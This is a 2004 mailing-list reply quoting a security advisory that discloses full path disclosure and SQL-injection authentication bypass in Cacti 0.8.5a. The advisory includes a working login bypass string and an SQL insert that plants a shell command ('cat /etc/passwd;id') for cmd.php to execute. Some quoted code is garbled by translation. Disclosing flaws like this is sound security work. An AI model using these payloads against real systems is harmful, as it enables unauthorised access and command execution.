Does this work on 0.8.5? I tried it and was unsuccessful. Thanks. Andy On Monday 16 August 2004 01:11 pm, Fernando Quintero wrote: > ///////////////////////////////////////////////////// > //// Vulnerable Program: CACTI > //// > //// Version : The latest version 0.8.5a > //// > //// Url: http://www.raxnet.net > //// > //// The Bug: SQL injection to allows bypass the auth. > //// > //// Date: Today, August 16 off 2004 > //// > //// Author: Fernando Quintero (a.k.a nonroot) > //// Email: nando@xxxxxxxxxxx > > > ////////////////////////////////////////////////////// > > > I. Affected software description: > > Cacti is a complete frontend to RRDTool, it stores all of the necessary > information to create graphs and populate them > with data in a MySQL database. The frontend is completely PHP driven. > Along with being able to maintain Graphs, Data > Sources, and Round Robin Archives in a database, cacti handles the data > gathering. There is also SNMP support for > those used to creating traffic graphs with MRTG. > > II. The BUgs > > > a) Full path disclosure > > In several parts of the code when anyone try to open files in > directories who do not appear at first like: include, > lib, scripts, etc. an error appears allowing to see the route him where > is installed the program. for example: > > http://127.0.0.1/cacti/include/auth.php > http://127.0.0.1/cacti/auth_login.php?action=login > http://127.0.0.1/cacti2/auth_changepassword.php?ref=index > php&action=changepassword&password=aaaaaa&confirm=aaaaaa&submit=Save > > These are low risk bugs, but similarly they allow to obtain data of the > remote system to a possible attacker. > > > b) SQL injection and bypass the authentication. > > Injection of code is possible in the index.php file to pass auth. When > the username and the password are evaluated by > auth_login.php, anyone can insert this: > > username = admin' or '6'='6 > password = password wished > > Where 'admin' is a user worth in cacti, the system allows this input and > to change inmediatly the passowrd. > this is the code: > > //auth_login.php > // line 33 ~ > > switch ($_request["action" ]) > {marries 'login': / * --- UPDATE old password with new md5 password > value */ > > db_execute("update user_auth Seth password = '" . md5($_POST["password" > ]) . "' where username='" . $_post["username" ] . "' and password = > PASSWORD (". $_POST["passw > ord"] . "')"); > > so, 'username' and 'password', can nevertheless be injected, this > nonserious possible if the variable > 'magic_quotes_gpc' it was to 'On' in the php.ini file of the system. > > Here is where enters debian. I it probe in SID with the latest version > of cacti, When it's installed, a > configuration file is created called cacti.conf in the route conf.d of > the apache. This file contains the > following information: > > ---BEGIN---- > > Alias /cacti /usr/share/cacti > > <DirectoryMatch /usr/share/cacti/> > Options +FollowSymLinks > AllowOverride None > order allow,deny > allow from all > <IfModule mod_php4.c> > AddType application/x-httpd-php .php > php_flag magic_quotes_gpc Off > php_flag short_open_tag On > php_flag register_globals On > php_flag register_argc_argv On > php_flag track_vars On > php_value include_path . > DirectoryIndex index.php > </IfModule> > </DirectoryMatch> > > -----END---- > > magic_quotes_gpc is put in Off in the line: > > php_flag magic_quotes_gpc Off > > Of this form everything is had what it is needed to carry out a > successful attack. Using this attack, > I would to inject some code in the table 'data_input_data_cache' and it > allowed me to execute a command in > the system with permissions of the user who runs the apache. > > a possible example for this is: > insert into data_input_data_cache (local_data_id, host_id, > data_input_id, action, command, hostname, snmp_community, > snmp_version, snmp_username, snmp_password, snmp_port, snmp_timeout, > rrd_name, rrd_path, rrd_num, arg1, arg2, arg3) > values ('9', '1', '7', '1', 'cat /etc/passwd;id;somecommand; some > script', '127.0.0.1', '', '1', '', '', '161', '500', > 'hack', '/', '3', 'NULL', 'NULL', 'NULL'); > > then points to http://127.0.0.1/cacti/cmd.php and the command will be > executed. > > III. SOLUTION: > > The coders where contacted and the code was fixed in the cvs ;). > The mantainer of cacti was contacted too. > > IV. GREETINGS > > - Greets All the community. I learn of you! > - Silence Team and the GIGAX Staff. > > > V. CONTACT > > Fernando Quintero > nando@xxxxxxxxxxx > Silence Team > > > VI. FINAL WORDS > > - Many applications would to be vulnerable with the configuration by > default of debian, check it!. > > - Sorry by the english, so !! Viva COLOMBIA !! > > > > Fernando Quintero > Silence Team > Colombia - South America
